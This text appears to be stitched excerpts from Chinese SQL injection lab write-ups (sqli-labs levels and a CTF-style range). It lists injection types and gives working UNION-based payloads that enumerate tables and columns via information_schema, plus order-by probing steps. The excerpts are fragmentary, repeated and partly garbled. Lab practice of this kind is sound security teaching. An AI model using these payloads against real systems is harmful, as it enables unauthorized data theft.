还有一些常见的注入分类,例如:(1)POST:注入字段位于POST数据中;(2)Cookie:注入字段位于Cookie数据中;(3)延时注入:根据数据库延时特性的注入(4)搜索注入:注入字段在搜索的位置;(5)base64注入:注入字符经过base64编码后注入;(7)错误注入:基于数据库错误信息的响应注入; 0x03 小试牛刀 1-20 1-20关通过请求参数...
uname=admin&passwd=-1'%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='security'#&submit=Submit 查询列名 uname=admin&passwd=-1'%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='us...
通过注入找到数据库中的Flag吧,Flag格式zKaQ-XXXXXXXX 基础靶场1 http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 数字型注入 判断字段个数 ?id=2orderby1?id=2orderby2?id=2orderby3?id=2orderby4报错 得出结论字段个数为3 判断数据在页面的显示位置 ?id=2and1=2unionselect1,2,3 判断...
uname=admin&passwd=-1'%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='security'#&submit=Submit 查询列名 uname=admin&passwd=-1'%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='us...